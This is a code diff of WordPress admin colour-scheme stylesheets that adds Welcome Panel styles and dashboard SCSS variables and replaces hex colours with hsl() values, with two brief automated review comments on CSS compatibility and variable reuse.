 .wp-core-ui.wp-customizer .theme-overlay .theme-header .close:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .close:hover, .wp-core-ui.wp-customizer .theme-overlay .theme-header .right:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .right:hover, .wp-core-ui.wp-customizer .theme-overlay .theme-header .left:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .left:hover {
670 670
   border-bottom-color: #c7a589;
671 671
   color: #0073aa;
672
+}
673
+
674
+/* Welcome Panel */
675
+.welcome-panel {
676
+  background-color: #f8f4f1;
677
+}
678
+
679
+.welcome-panel-header-image .about-six {
680
+  fill: #c7a589;
681
+}
682
+
683
+.welcome-panel-header-image .about-zero {
684
+  fill: #59524c;
685
+}
686
+
687
+[class*=welcome-panel-icon] {
688
+  background-color: #59524c;
672 689
 }

File diff suppressed because it is too large
+ 1 - 1
app/wp-admin/css/colors/coffee/colors-rtl.min.css


+ 26 - 9
app/wp-admin/css/colors/coffee/colors.css

@@ -167,7 +167,7 @@ textarea:focus {
167 167
   color: #9ea476;
168 168
 }
169 169
 .wp-core-ui .wp-ui-text-icon {
170
-  color: #f3f2f1;
170
+  color: hsl(27.6923076923deg, 7%, 95%);
171 171
 }
172 172
 
173 173
 /* List tables */
@@ -196,7 +196,7 @@ textarea:focus {
196 196
 }
197 197
 
198 198
 #adminmenu div.wp-menu-image:before {
199
-  color: #f3f2f1;
199
+  color: hsl(27.6923076923deg, 7%, 95%);
200 200
 }
201 201
 
202 202
 #adminmenu a:hover,
@@ -308,7 +308,7 @@ ul#adminmenu > li.current > a.current:after {
308 308
 
309 309
 /* Admin Menu: collapse button */
310 310
 #collapse-button {
311
-  color: #f3f2f1;
311
+  color: hsl(27.6923076923deg, 7%, 95%);
312 312
 }
313 313
 
314 314
 #collapse-button:hover,
@@ -333,7 +333,7 @@ ul#adminmenu > li.current > a.current:after {
333 333
 #wpadminbar .ab-icon:before,
334 334
 #wpadminbar .ab-item:before,
335 335
 #wpadminbar .ab-item:after {
336
-  color: #f3f2f1;
336
+  color: hsl(27.6923076923deg, 7%, 95%);
337 337
 }
338 338
 
339 339
 #wpadminbar:not(.mobile) .ab-top-menu > li:hover > .ab-item,
@@ -377,7 +377,7 @@ ul#adminmenu > li.current > a.current:after {
377 377
 
378 378
 #wpadminbar .quicklinks li .blavatar,
379 379
 #wpadminbar .menupop .menupop > .ab-item:before {
380
-  color: #f3f2f1;
380
+  color: hsl(27.6923076923deg, 7%, 95%);
381 381
 }
382 382
 
383 383
 #wpadminbar .quicklinks .menupop ul li a:hover,
@@ -412,12 +412,12 @@ ul#adminmenu > li.current > a.current:after {
412 412
 
413 413
 #wpadminbar.mobile .quicklinks .hover .ab-icon:before,
414 414
 #wpadminbar.mobile .quicklinks .hover .ab-item:before {
415
-  color: #f3f2f1;
415
+  color: hsl(27.6923076923deg, 7%, 95%);
416 416
 }
417 417
 
418 418
 /* Admin Bar: search */
419 419
 #wpadminbar #adminbarsearch:before {
420
-  color: #f3f2f1;
420
+  color: hsl(27.6923076923deg, 7%, 95%);
421 421
 }
422 422
 
423 423
 #wpadminbar > #wp-toolbar > #wp-admin-bar-top-secondary > #wp-admin-bar-search #adminbarsearch input.adminbar-input:focus {
@@ -553,7 +553,7 @@ body.more-filters-opened .more-filters:focus:before {
553 553
 
554 554
 /* Responsive Component */
555 555
 div#wp-responsive-toggle a:before {
556
-  color: #f3f2f1;
556
+  color: hsl(27.6923076923deg, 7%, 95%);
557 557
 }
558 558
 
559 559
 .wp-responsive-open div#wp-responsive-toggle a {
@@ -566,7 +566,7 @@ div#wp-responsive-toggle a:before {
566 566
 }
567 567
 
568 568
 .wp-responsive-open #wpadminbar #wp-admin-bar-menu-toggle .ab-icon:before {
569
-  color: #f3f2f1;
569
+  color: hsl(27.6923076923deg, 7%, 95%);
570 570
 }
571 571
 
572 572
 /* TinyMCE */
@@ -669,4 +669,21 @@ div#wp-responsive-toggle a:before {
669 669
 .wp-core-ui.wp-customizer .theme-overlay .theme-header .close:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .close:hover, .wp-core-ui.wp-customizer .theme-overlay .theme-header .right:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .right:hover, .wp-core-ui.wp-customizer .theme-overlay .theme-header .left:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .left:hover {
670 670
   border-bottom-color: #c7a589;
671 671
   color: #0073aa;
672
+}
673
+
674
+/* Welcome Panel */
675
+.welcome-panel {
676
+  background-color: #f8f4f1;
677
+}
678
+
679
+.welcome-panel-header-image .about-six {
680
+  fill: #c7a589;
681
+}
682
+
683
+.welcome-panel-header-image .about-zero {
684
+  fill: #59524c;
685
+}
686
+
687
+[class*=welcome-panel-icon] {
688
+  background-color: #59524c;
672 689
 }

File diff suppressed because it is too large
+ 1 - 1
app/wp-admin/css/colors/coffee/colors.min.css


+ 1 - 0
app/wp-admin/css/colors/coffee/colors.scss

@@ -1,3 +1,4 @@
1
+$scheme-name: "coffee";
1 2
 $base-color: #59524c;
2 3
 $highlight-color: #c7a589;
3 4
 $notification-color: #9ea476;

+ 17 - 0
app/wp-admin/css/colors/ectoplasm/colors-rtl.css

@@ -702,4 +702,21 @@ div#wp-responsive-toggle a:before {
702 702
 .wp-core-ui.wp-customizer .theme-overlay .theme-header .close:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .close:hover, .wp-core-ui.wp-customizer .theme-overlay .theme-header .right:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .right:hover, .wp-core-ui.wp-customizer .theme-overlay .theme-header .left:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .left:hover {
703 703
   border-bottom-color: #a3b745;
704 704
   color: #0073aa;
705
+}
706
+
707
+/* Welcome Panel */
708
+.welcome-panel {
709
+  background-color: #f4f6e9;
710
+}
711
+
712
+.welcome-panel-header-image .about-six {
713
+  fill: #a3b745;
714
+}
715
+
716
+.welcome-panel-header-image .about-zero {
717
+  fill: #523f6d;
718
+}
719
+
720
+[class*=welcome-panel-icon] {
721
+  background-color: #523f6d;
705 722
 }

File diff suppressed because it is too large
+ 1 - 1
app/wp-admin/css/colors/ectoplasm/colors-rtl.min.css


+ 17 - 0
app/wp-admin/css/colors/ectoplasm/colors.css

@@ -702,4 +702,21 @@ div#wp-responsive-toggle a:before {
702 702
 .wp-core-ui.wp-customizer .theme-overlay .theme-header .close:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .close:hover, .wp-core-ui.wp-customizer .theme-overlay .theme-header .right:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .right:hover, .wp-core-ui.wp-customizer .theme-overlay .theme-header .left:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .left:hover {
703 703
   border-bottom-color: #a3b745;
704 704
   color: #0073aa;
705
+}
706
+
707
+/* Welcome Panel */
708
+.welcome-panel {
709
+  background-color: #f4f6e9;
710
+}
711
+
712
+.welcome-panel-header-image .about-six {
713
+  fill: #a3b745;
714
+}
715
+
716
+.welcome-panel-header-image .about-zero {
717
+  fill: #523f6d;
718
+}
719
+
720
+[class*=welcome-panel-icon] {
721
+  background-color: #523f6d;
705 722
 }

File diff suppressed because it is too large
+ 1 - 1
app/wp-admin/css/colors/ectoplasm/colors.min.css


+ 1 - 0
app/wp-admin/css/colors/ectoplasm/colors.scss

@@ -1,3 +1,4 @@
1
+$scheme-name: "ectoplasm";
1 2
 $base-color: #523f6d;
2 3
 $icon-color: #ece6f6;
3 4
 $highlight-color: #a3b745;

+ 17 - 0
app/wp-admin/css/colors/light/colors-rtl.css

@@ -704,6 +704,23 @@ div#wp-responsive-toggle a:before {
704 704
   color: #0073aa;
705 705
 }
706 706
 
707
+/* Welcome Panel */
708
+.welcome-panel {
709
+  background-color: #e1f4f9;
710
+}
711
+
712
+.welcome-panel-header-image .about-six {
713
+  fill: #04a4cc;
714
+}
715
+
716
+.welcome-panel-header-image .about-zero {
717
+  fill: #999;
718
+}
719
+
720
+[class*=welcome-panel-icon] {
721
+  background-color: #333;
722
+}
723
+
707 724
 /* Override the theme filter highlight color for this scheme */
708 725
 .theme-section.current,
709 726
 .theme-filter.current {

File diff suppressed because it is too large
+ 1 - 1
app/wp-admin/css/colors/light/colors-rtl.min.css


+ 17 - 0
app/wp-admin/css/colors/light/colors.css

@@ -704,6 +704,23 @@ div#wp-responsive-toggle a:before {
704 704
   color: #0073aa;
705 705
 }
706 706
 
707
+/* Welcome Panel */
708
+.welcome-panel {
709
+  background-color: #e1f4f9;
710
+}
711
+
712
+.welcome-panel-header-image .about-six {
713
+  fill: #04a4cc;
714
+}
715
+
716
+.welcome-panel-header-image .about-zero {
717
+  fill: #999;
718
+}
719
+
720
+[class*=welcome-panel-icon] {
721
+  background-color: #333;
722
+}
723
+
707 724
 /* Override the theme filter highlight color for this scheme */
708 725
 .theme-section.current,
709 726
 .theme-filter.current {

File diff suppressed because it is too large
+ 1 - 1
app/wp-admin/css/colors/light/colors.min.css


+ 4 - 0
app/wp-admin/css/colors/light/colors.scss

@@ -1,3 +1,4 @@
1
+$scheme-name: "light";
1 2
 $base-color: #e5e5e5;
2 3
 $icon-color: #999;
3 4
 $text-color: #333;
@@ -17,6 +18,9 @@ $menu-submenu-background: #fff;
17 18
 $menu-collapse-text: #777;
18 19
 $menu-collapse-focus-icon: #555;
19 20
 
21
+$dashboard-accent-2: $icon-color;
22
+$dashboard-icon-background: $text-color;
23
+
20 24
 @import "../_admin.scss";
21 25
 
22 26
 /* Override the theme filter highlight color for this scheme */

+ 26 - 9
app/wp-admin/css/colors/midnight/colors-rtl.css

@@ -188,7 +188,7 @@ textarea:focus {
188 188
   color: #69a8bb;
189 189
 }
190 190
 .wp-core-ui .wp-ui-text-icon {
191
-  color: #f1f2f3;
191
+  color: hsl(206.6666666667deg, 7%, 95%);
192 192
 }
193 193
 
194 194
 /* List tables */
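Review bot: the replacement value on `.wp-core-ui .wp-ui-text-icon` writes the hue with a `deg` unit and ten decimals, `hsl(206.6666666667deg, 7%, 95%)`, which resolves to the same colour as the `#f1f2f3` it replaces. Browsers that only accept the older unitless-hue form of `hsl()` will drop the declaration, and the rule has no other `color` to fall back on. Since this looks like compiler output rather than an intended change, consider emitting the hex value, or keeping a hex declaration ahead of the `hsl()` one; the same substitution recurs in the later hunks of this file.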
@@ -229,7 +229,7 @@ textarea:focus {
229 229
 }
230 230
 
231 231
 #adminmenu div.wp-menu-image:before {
232
-  color: #f1f2f3;
232
+  color: hsl(206.6666666667deg, 7%, 95%);
233 233
 }
234 234
 
235 235
 #adminmenu a:hover,
@@ -341,7 +341,7 @@ ul#adminmenu > li.current > a.current:after {
341 341
 
342 342
 /* Admin Menu: collapse button */
343 343
 #collapse-button {
344
-  color: #f1f2f3;
344
+  color: hsl(206.6666666667deg, 7%, 95%);
345 345
 }
346 346
 
347 347
 #collapse-button:hover,
@@ -366,7 +366,7 @@ ul#adminmenu > li.current > a.current:after {
366 366
 #wpadminbar .ab-icon:before,
367 367
 #wpadminbar .ab-item:before,
368 368
 #wpadminbar .ab-item:after {
369
-  color: #f1f2f3;
369
+  color: hsl(206.6666666667deg, 7%, 95%);
370 370
 }
371 371
 
372 372
 #wpadminbar:not(.mobile) .ab-top-menu > li:hover > .ab-item,
@@ -410,7 +410,7 @@ ul#adminmenu > li.current > a.current:after {
410 410
 
411 411
 #wpadminbar .quicklinks li .blavatar,
412 412
 #wpadminbar .menupop .menupop > .ab-item:before {
413
-  color: #f1f2f3;
413
+  color: hsl(206.6666666667deg, 7%, 95%);
414 414
 }
415 415
 
416 416
 #wpadminbar .quicklinks .menupop ul li a:hover,
@@ -445,12 +445,12 @@ ul#adminmenu > li.current > a.current:after {
445 445
 
446 446
 #wpadminbar.mobile .quicklinks .hover .ab-icon:before,
447 447
 #wpadminbar.mobile .quicklinks .hover .ab-item:before {
448
-  color: #f1f2f3;
448
+  color: hsl(206.6666666667deg, 7%, 95%);
449 449
 }
450 450
 
451 451
 /* Admin Bar: search */
452 452
 #wpadminbar #adminbarsearch:before {
453
-  color: #f1f2f3;
453
+  color: hsl(206.6666666667deg, 7%, 95%);
454 454
 }
455 455
 
456 456
 #wpadminbar > #wp-toolbar > #wp-admin-bar-top-secondary > #wp-admin-bar-search #adminbarsearch input.adminbar-input:focus {
@@ -586,7 +586,7 @@ body.more-filters-opened .more-filters:focus:before {
586 586
 
587 587
 /* Responsive Component */
588 588
 div#wp-responsive-toggle a:before {
589
-  color: #f1f2f3;
589
+  color: hsl(206.6666666667deg, 7%, 95%);
590 590
 }
591 591
 
592 592
 .wp-responsive-open div#wp-responsive-toggle a {
@@ -599,7 +599,7 @@ div#wp-responsive-toggle a:before {
599 599
 }
600 600
 
601 601
 .wp-responsive-open #wpadminbar #wp-admin-bar-menu-toggle .ab-icon:before {
602
-  color: #f1f2f3;
602
+  color: hsl(206.6666666667deg, 7%, 95%);
603 603
 }
604 604
 
605 605
 /* TinyMCE */
@@ -702,4 +702,21 @@ div#wp-responsive-toggle a:before {
702 702
 .wp-core-ui.wp-customizer .theme-overlay .theme-header .close:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .close:hover, .wp-core-ui.wp-customizer .theme-overlay .theme-header .right:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .right:hover, .wp-core-ui.wp-customizer .theme-overlay .theme-header .left:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .left:hover {
703 703
   border-bottom-color: #e14d43;
704 704
   color: #0073aa;
705
+}
706
+
707
+/* Welcome Panel */
708
+.welcome-panel {
709
+  background-color: #fbeae8;
710
+}
711
+
712
+.welcome-panel-header-image .about-six {
713
+  fill: #e14d43;
714
+}
715
+
716
+.welcome-panel-header-image .about-zero {
717
+  fill: #363b3f;
718
+}
719
+
720
+[class*=welcome-panel-icon] {
721
+  background-color: #e14d43;
705 722
 }

File diff suppressed because it is too large
+ 1 - 1
app/wp-admin/css/colors/midnight/colors-rtl.min.css


+ 26 - 9
app/wp-admin/css/colors/midnight/colors.css

@@ -188,7 +188,7 @@ textarea:focus {
188 188
   color: #69a8bb;
189 189
 }
190 190
 .wp-core-ui .wp-ui-text-icon {
191
-  color: #f1f2f3;
191
+  color: hsl(206.6666666667deg, 7%, 95%);
192 192
 }
193 193
 
194 194
 /* List tables */
@@ -229,7 +229,7 @@ textarea:focus {
229 229
 }
230 230
 
231 231
 #adminmenu div.wp-menu-image:before {
232
-  color: #f1f2f3;
232
+  color: hsl(206.6666666667deg, 7%, 95%);
233 233
 }
234 234
 
235 235
 #adminmenu a:hover,
@@ -341,7 +341,7 @@ ul#adminmenu > li.current > a.current:after {
341 341
 
342 342
 /* Admin Menu: collapse button */
343 343
 #collapse-button {
344
-  color: #f1f2f3;
344
+  color: hsl(206.6666666667deg, 7%, 95%);
345 345
 }
346 346
 
347 347
 #collapse-button:hover,
@@ -366,7 +366,7 @@ ul#adminmenu > li.current > a.current:after {
366 366
 #wpadminbar .ab-icon:before,
367 367
 #wpadminbar .ab-item:before,
368 368
 #wpadminbar .ab-item:after {
369
-  color: #f1f2f3;
369
+  color: hsl(206.6666666667deg, 7%, 95%);
370 370
 }
371 371
 
372 372
 #wpadminbar:not(.mobile) .ab-top-menu > li:hover > .ab-item,
@@ -410,7 +410,7 @@ ul#adminmenu > li.current > a.current:after {
410 410
 
411 411
 #wpadminbar .quicklinks li .blavatar,
412 412
 #wpadminbar .menupop .menupop > .ab-item:before {
413
-  color: #f1f2f3;
413
+  color: hsl(206.6666666667deg, 7%, 95%);
414 414
 }
415 415
 
416 416
 #wpadminbar .quicklinks .menupop ul li a:hover,
@@ -445,12 +445,12 @@ ul#adminmenu > li.current > a.current:after {
445 445
 
446 446
 #wpadminbar.mobile .quicklinks .hover .ab-icon:before,
447 447
 #wpadminbar.mobile .quicklinks .hover .ab-item:before {
448
-  color: #f1f2f3;
448
+  color: hsl(206.6666666667deg, 7%, 95%);
449 449
 }
450 450
 
451 451
 /* Admin Bar: search */
452 452
 #wpadminbar #adminbarsearch:before {
453
-  color: #f1f2f3;
453
+  color: hsl(206.6666666667deg, 7%, 95%);
454 454
 }
455 455
 
456 456
 #wpadminbar > #wp-toolbar > #wp-admin-bar-top-secondary > #wp-admin-bar-search #adminbarsearch input.adminbar-input:focus {
@@ -586,7 +586,7 @@ body.more-filters-opened .more-filters:focus:before {
586 586
 
587 587
 /* Responsive Component */
588 588
 div#wp-responsive-toggle a:before {
589
-  color: #f1f2f3;
589
+  color: hsl(206.6666666667deg, 7%, 95%);
590 590
 }
591 591
 
592 592
 .wp-responsive-open div#wp-responsive-toggle a {
@@ -599,7 +599,7 @@ div#wp-responsive-toggle a:before {
599 599
 }
600 600
 
601 601
 .wp-responsive-open #wpadminbar #wp-admin-bar-menu-toggle .ab-icon:before {
602
-  color: #f1f2f3;
602
+  color: hsl(206.6666666667deg, 7%, 95%);
603 603
 }
604 604
 
605 605
 /* TinyMCE */
@@ -702,4 +702,21 @@ div#wp-responsive-toggle a:before {
702 702
 .wp-core-ui.wp-customizer .theme-overlay .theme-header .close:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .close:hover, .wp-core-ui.wp-customizer .theme-overlay .theme-header .right:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .right:hover, .wp-core-ui.wp-customizer .theme-overlay .theme-header .left:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .left:hover {
703 703
   border-bottom-color: #e14d43;
704 704
   color: #0073aa;
705
+}
706
+
707
+/* Welcome Panel */
708
+.welcome-panel {
709
+  background-color: #fbeae8;
710
+}
711
+
712
+.welcome-panel-header-image .about-six {
713
+  fill: #e14d43;
714
+}
715
+
716
+.welcome-panel-header-image .about-zero {
717
+  fill: #363b3f;
718
+}
719
+
720
+[class*=welcome-panel-icon] {
721
+  background-color: #e14d43;
705 722
 }

File diff suppressed because it is too large
+ 1 - 1
app/wp-admin/css/colors/midnight/colors.min.css


+ 3 - 0
app/wp-admin/css/colors/midnight/colors.scss

@@ -1,5 +1,8 @@
1
+$scheme-name: "midnight";
1 2
 $base-color: #363b3f;
2 3
 $highlight-color: #e14d43;
3 4
 $notification-color: #69a8bb;
4 5
 
6
+$dashboard-icon-background: $highlight-color;
7
+
5 8
 @import "../_admin.scss";

+ 26 - 9
app/wp-admin/css/colors/modern/colors-rtl.css

@@ -188,7 +188,7 @@ textarea:focus {
188 188
   color: #3858e9;
189 189
 }
190 190
 .wp-core-ui .wp-ui-text-icon {
191
-  color: #f3f1f1;
191
+  color: hsl(0deg, 7%, 95%);
192 192
 }
193 193
 
194 194
 /* List tables */
@@ -229,7 +229,7 @@ textarea:focus {
229 229
 }
230 230
 
231 231
 #adminmenu div.wp-menu-image:before {
232
-  color: #f3f1f1;
232
+  color: hsl(0deg, 7%, 95%);
233 233
 }
234 234
 
235 235
 #adminmenu a:hover,
@@ -341,7 +341,7 @@ ul#adminmenu > li.current > a.current:after {
341 341
 
342 342
 /* Admin Menu: collapse button */
343 343
 #collapse-button {
344
-  color: #f3f1f1;
344
+  color: hsl(0deg, 7%, 95%);
345 345
 }
346 346
 
347 347
 #collapse-button:hover,
@@ -366,7 +366,7 @@ ul#adminmenu > li.current > a.current:after {
366 366
 #wpadminbar .ab-icon:before,
367 367
 #wpadminbar .ab-item:before,
368 368
 #wpadminbar .ab-item:after {
369
-  color: #f3f1f1;
369
+  color: hsl(0deg, 7%, 95%);
370 370
 }
371 371
 
372 372
 #wpadminbar:not(.mobile) .ab-top-menu > li:hover > .ab-item,
@@ -410,7 +410,7 @@ ul#adminmenu > li.current > a.current:after {
410 410
 
411 411
 #wpadminbar .quicklinks li .blavatar,
412 412
 #wpadminbar .menupop .menupop > .ab-item:before {
413
-  color: #f3f1f1;
413
+  color: hsl(0deg, 7%, 95%);
414 414
 }
415 415
 
416 416
 #wpadminbar .quicklinks .menupop ul li a:hover,
@@ -445,12 +445,12 @@ ul#adminmenu > li.current > a.current:after {
445 445
 
446 446
 #wpadminbar.mobile .quicklinks .hover .ab-icon:before,
447 447
 #wpadminbar.mobile .quicklinks .hover .ab-item:before {
448
-  color: #f3f1f1;
448
+  color: hsl(0deg, 7%, 95%);
449 449
 }
450 450
 
451 451
 /* Admin Bar: search */
452 452
 #wpadminbar #adminbarsearch:before {
453
-  color: #f3f1f1;
453
+  color: hsl(0deg, 7%, 95%);
454 454
 }
455 455
 
456 456
 #wpadminbar > #wp-toolbar > #wp-admin-bar-top-secondary > #wp-admin-bar-search #adminbarsearch input.adminbar-input:focus {
@@ -586,7 +586,7 @@ body.more-filters-opened .more-filters:focus:before {
586 586
 
587 587
 /* Responsive Component */
588 588
 div#wp-responsive-toggle a:before {
589
-  color: #f3f1f1;
589
+  color: hsl(0deg, 7%, 95%);
590 590
 }
591 591
 
592 592
 .wp-responsive-open div#wp-responsive-toggle a {
@@ -599,7 +599,7 @@ div#wp-responsive-toggle a:before {
599 599
 }
600 600
 
601 601
 .wp-responsive-open #wpadminbar #wp-admin-bar-menu-toggle .ab-icon:before {
602
-  color: #f3f1f1;
602
+  color: hsl(0deg, 7%, 95%);
603 603
 }
604 604
 
605 605
 /* TinyMCE */
@@ -702,4 +702,21 @@ div#wp-responsive-toggle a:before {
702 702
 .wp-core-ui.wp-customizer .theme-overlay .theme-header .close:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .close:hover, .wp-core-ui.wp-customizer .theme-overlay .theme-header .right:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .right:hover, .wp-core-ui.wp-customizer .theme-overlay .theme-header .left:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .left:hover {
703 703
   border-bottom-color: #3858e9;
704 704
   color: #3858e9;
705
+}
706
+
707
+/* Welcome Panel */
708
+.welcome-panel {
709
+  background-color: #e7ebfc;
710
+}
711
+
712
+.welcome-panel-header-image .about-six {
713
+  fill: #3858e9;
714
+}
715
+
716
+.welcome-panel-header-image .about-zero {
717
+  fill: #1b8362;
718
+}
719
+
720
+[class*=welcome-panel-icon] {
721
+  background-color: #1d2327;
705 722
 }

File diff suppressed because it is too large
+ 1 - 1
app/wp-admin/css/colors/modern/colors-rtl.min.css


+ 26 - 9
app/wp-admin/css/colors/modern/colors.css

@@ -188,7 +188,7 @@ textarea:focus {
188 188
   color: #3858e9;
189 189
 }
190 190
 .wp-core-ui .wp-ui-text-icon {
191
-  color: #f3f1f1;
191
+  color: hsl(0deg, 7%, 95%);
192 192
 }
193 193
 
194 194
 /* List tables */
@@ -229,7 +229,7 @@ textarea:focus {
229 229
 }
230 230
 
231 231
 #adminmenu div.wp-menu-image:before {
232
-  color: #f3f1f1;
232
+  color: hsl(0deg, 7%, 95%);
233 233
 }
234 234
 
235 235
 #adminmenu a:hover,
@@ -341,7 +341,7 @@ ul#adminmenu > li.current > a.current:after {
341 341
 
342 342
 /* Admin Menu: collapse button */
343 343
 #collapse-button {
344
-  color: #f3f1f1;
344
+  color: hsl(0deg, 7%, 95%);
345 345
 }
346 346
 
347 347
 #collapse-button:hover,
@@ -366,7 +366,7 @@ ul#adminmenu > li.current > a.current:after {
366 366
 #wpadminbar .ab-icon:before,
367 367
 #wpadminbar .ab-item:before,
368 368
 #wpadminbar .ab-item:after {
369
-  color: #f3f1f1;
369
+  color: hsl(0deg, 7%, 95%);
370 370
 }
371 371
 
372 372
 #wpadminbar:not(.mobile) .ab-top-menu > li:hover > .ab-item,
@@ -410,7 +410,7 @@ ul#adminmenu > li.current > a.current:after {
410 410
 
411 411
 #wpadminbar .quicklinks li .blavatar,
412 412
 #wpadminbar .menupop .menupop > .ab-item:before {
413
-  color: #f3f1f1;
413
+  color: hsl(0deg, 7%, 95%);
414 414
 }
415 415
 
416 416
 #wpadminbar .quicklinks .menupop ul li a:hover,
@@ -445,12 +445,12 @@ ul#adminmenu > li.current > a.current:after {
445 445
 
446 446
 #wpadminbar.mobile .quicklinks .hover .ab-icon:before,
447 447
 #wpadminbar.mobile .quicklinks .hover .ab-item:before {
448
-  color: #f3f1f1;
448
+  color: hsl(0deg, 7%, 95%);
449 449
 }
450 450
 
451 451
 /* Admin Bar: search */
452 452
 #wpadminbar #adminbarsearch:before {
453
-  color: #f3f1f1;
453
+  color: hsl(0deg, 7%, 95%);
454 454
 }
455 455
 
456 456
 #wpadminbar > #wp-toolbar > #wp-admin-bar-top-secondary > #wp-admin-bar-search #adminbarsearch input.adminbar-input:focus {
@@ -586,7 +586,7 @@ body.more-filters-opened .more-filters:focus:before {
586 586
 
587 587
 /* Responsive Component */
588 588
 div#wp-responsive-toggle a:before {
589
-  color: #f3f1f1;
589
+  color: hsl(0deg, 7%, 95%);
590 590
 }
591 591
 
592 592
 .wp-responsive-open div#wp-responsive-toggle a {
@@ -599,7 +599,7 @@ div#wp-responsive-toggle a:before {
599 599
 }
600 600
 
601 601
 .wp-responsive-open #wpadminbar #wp-admin-bar-menu-toggle .ab-icon:before {
602
-  color: #f3f1f1;
602
+  color: hsl(0deg, 7%, 95%);
603 603
 }
604 604
 
605 605
 /* TinyMCE */
@@ -702,4 +702,21 @@ div#wp-responsive-toggle a:before {
702 702
 .wp-core-ui.wp-customizer .theme-overlay .theme-header .close:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .close:hover, .wp-core-ui.wp-customizer .theme-overlay .theme-header .right:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .right:hover, .wp-core-ui.wp-customizer .theme-overlay .theme-header .left:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .left:hover {
703 703
   border-bottom-color: #3858e9;
704 704
   color: #3858e9;
705
+}
706
+
707
+/* Welcome Panel */
708
+.welcome-panel {
709
+  background-color: #e7ebfc;
710
+}
711
+
712
+.welcome-panel-header-image .about-six {
713
+  fill: #3858e9;
714
+}
715
+
716
+.welcome-panel-header-image .about-zero {
717
+  fill: #1b8362;
718
+}
719
+
720
+[class*=welcome-panel-icon] {
721
+  background-color: #1d2327;
705 722
 }

File diff suppressed because it is too large
+ 1 - 1
app/wp-admin/css/colors/modern/colors.min.css


+ 5 - 0
app/wp-admin/css/colors/modern/colors.scss

@@ -1,3 +1,4 @@
1
+$scheme-name: "modern";
1 2
 $base-color: #1e1e1e;
2 3
 $highlight-color: #3858e9;
3 4
 $menu-submenu-focus-text: #33f078;
@@ -6,4 +7,8 @@ $notification-color: $highlight-color;
6 7
 $link: $highlight-color;
7 8
 $link-focus: darken($highlight-color, 10%);
8 9
 
10
+$dashboard-accent-1: #3858e9;
11
+$dashboard-accent-2: #1b8362;
12
+$dashboard-icon-background: #1d2327;
13
+
9 14
 @import "../_admin.scss";
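Review bot: `$dashboard-accent-1: #3858e9;` repeats the literal already assigned to `$highlight-color` at the top of this file, so the two can drift apart if the scheme's highlight is ever changed. Writing `$dashboard-accent-1: $highlight-color;` would match how the midnight scheme sets `$dashboard-icon-background: $highlight-color;`. A one-line comment saying what the three `$dashboard-*` variables style would also help, since nothing in this file shows where they are consumed.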

+ 17 - 0
app/wp-admin/css/colors/ocean/colors-rtl.css

@@ -669,4 +669,21 @@ div#wp-responsive-toggle a:before {
669 669
 .wp-core-ui.wp-customizer .theme-overlay .theme-header .close:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .close:hover, .wp-core-ui.wp-customizer .theme-overlay .theme-header .right:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .right:hover, .wp-core-ui.wp-customizer .theme-overlay .theme-header .left:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .left:hover {
670 670
   border-bottom-color: #9ebaa0;
671 671
   color: #0073aa;
672
+}
673
+
674
+/* Welcome Panel */
675
+.welcome-panel {
676
+  background-color: #f3f7f4;
677
+}
678
+
679
+.welcome-panel-header-image .about-six {
680
+  fill: #9ebaa0;
681
+}
682
+
683
+.welcome-panel-header-image .about-zero {
684
+  fill: #738e96;
685
+}
686
+
687
+[class*=welcome-panel-icon] {
688
+  background-color: #738e96;
672 689
 }

File diff suppressed because it is too large
+ 1 - 1
app/wp-admin/css/colors/ocean/colors-rtl.min.css


+ 17 - 0
app/wp-admin/css/colors/ocean/colors.css

@@ -669,4 +669,21 @@ div#wp-responsive-toggle a:before {
669 669
 .wp-core-ui.wp-customizer .theme-overlay .theme-header .close:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .close:hover, .wp-core-ui.wp-customizer .theme-overlay .theme-header .right:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .right:hover, .wp-core-ui.wp-customizer .theme-overlay .theme-header .left:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .left:hover {
670 670
   border-bottom-color: #9ebaa0;
671 671
   color: #0073aa;
672
+}
673
+
674
+/* Welcome Panel */
675
+.welcome-panel {
676
+  background-color: #f3f7f4;
677
+}
678
+
679
+.welcome-panel-header-image .about-six {
680
+  fill: #9ebaa0;
681
+}
682
+
683
+.welcome-panel-header-image .about-zero {
684
+  fill: #738e96;
685
+}
686
+
687
+[class*=welcome-panel-icon] {
688
+  background-color: #738e96;
672 689
 }

File diff suppressed because it is too large
+ 1 - 1
app/wp-admin/css/colors/ocean/colors.min.css


+ 1 - 0
app/wp-admin/css/colors/ocean/colors.scss

@@ -1,3 +1,4 @@
1
+$scheme-name: "ocean";
1 2
 $base-color: #738e96;
2 3
 $icon-color: #f2fcff;
3 4
 $highlight-color: #9ebaa0;

+ 26 - 9
app/wp-admin/css/colors/sunrise/colors-rtl.css

@@ -188,7 +188,7 @@ textarea:focus {
188 188
   color: #ccaf0b;
189 189
 }
190 190
 .wp-core-ui .wp-ui-text-icon {
191
-  color: #f3f1f1;
191
+  color: hsl(2.1582733813deg, 7%, 95%);
192 192
 }
193 193
 
194 194
 /* List tables */
